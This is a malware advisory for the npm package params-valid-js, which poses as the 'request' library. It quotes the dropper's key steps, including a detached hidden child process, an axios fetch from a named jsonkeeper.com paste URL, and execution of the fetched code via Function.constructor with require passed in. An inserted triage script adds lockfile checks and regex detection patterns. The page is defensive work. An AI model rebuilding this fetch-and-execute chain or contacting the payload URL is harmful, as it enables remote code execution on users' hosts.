Malicious package

params-valid-js (npm)

Malicious code in params-valid-js (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5988
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall params-valid-js

What this malware does

params-valid-js impersonates the well-known request package: it copies Mikeal Rogers' Apache-2.0 header, points its bugs URL to github.com/request/request/issues, and replicates request's API surface, while shipping a remote-code dropper.

index.js exports a function shaped like Express middleware ((req,res,next)=>next()) as module.exports, default, and reqValidator. When invoked, the middleware calls swapJson(...), which spawns node lib/callers.js with { detached: true, stdio: 'ignore' } and child.unref(), concealing all output. lib/callers.js then performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), extracts data.Cookie, and executes the response body with new Function.constructor('require', s); handler(require);, passing the real require into the fetched code.

jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack triggers arbitrary remote code execution on the host.
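An added triage sketch (not code from the advisory or from the package): it checks a parsed package-lock.json for params-valid-js, including transitive and aliased installs, and matches source text against the behaviours described above. The function names, indicator regexes and sample lockfile are assumptions constructed for illustration.

```javascript
// Added example. Package name, version and paste host come from the advisory;
// function names, regexes and sample inputs are constructed for illustration.
const BAD_NAME = 'params-valid-js';
const BAD_VERSIONS = new Set(['1.0.0']);

// Behaviours the advisory attributes to index.js and lib/callers.js.
const INDICATORS = {
  detachedSpawn: /detached\s*:\s*true/,
  silencedStdio: /stdio\s*:\s*['"]ignore['"]/,
  unrefChild: /\.unref\s*\(/,
  functionConstructor: /\bFunction\s*(\.\s*constructor\s*)?\(/,
  pasteHostFetch: /https?:\/\/(www\.)?jsonkeeper\.com\//i,
};

// Find every lockfile entry that resolves to the package, however deeply nested.
// Handles lockfileVersion 2/3 ("packages" map) and 1 (nested "dependencies").
function findInLockfile(lock) {
  const hits = [];
  const add = (path, version) => {
    if (hits.some((h) => h.path === path)) return; // v2 lists both layouts
    hits.push({ path, version, flagged: BAD_VERSIONS.has(version) });
  };
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    const name = meta.name || path.split('node_modules/').pop();
    if (name === BAD_NAME) add(path, meta.version);
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${trail}node_modules/${name}`;
      if (name === BAD_NAME) add(path, meta.version);
      walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Return the names of the indicators present in one source file's text.
function scanSource(text) {
  return Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(text));
}

// Constructed lockfile (v3 layout) that pulls the package in transitively.
const SAMPLE_LOCK = {
  packages: {
    '': { name: 'demo-app', version: '0.1.0' },
    'node_modules/demo-lib/node_modules/params-valid-js': { version: '1.0.0' },
  },
};
console.log(findInLockfile(SAMPLE_LOCK));
```

Pass findInLockfile the result of JSON.parse on your own package-lock.json. Treat scanSource matches as triage signals only, since detached child processes and Function constructors also occur in legitimate code.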

Malicious versions

1 flagged
1.0.0

Indicators of compromise (SHA-256)

4f0f4f5cc684f7bf7b40af2f6856c7d5865f57c7492da68af6c1c194741a4629

Frequently asked questions

No. params-valid-js on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006882

Credits

  • Amazon Inspector · finder

params-valid-js (npm) malicious package — MAL-2026-5988 | O3 Security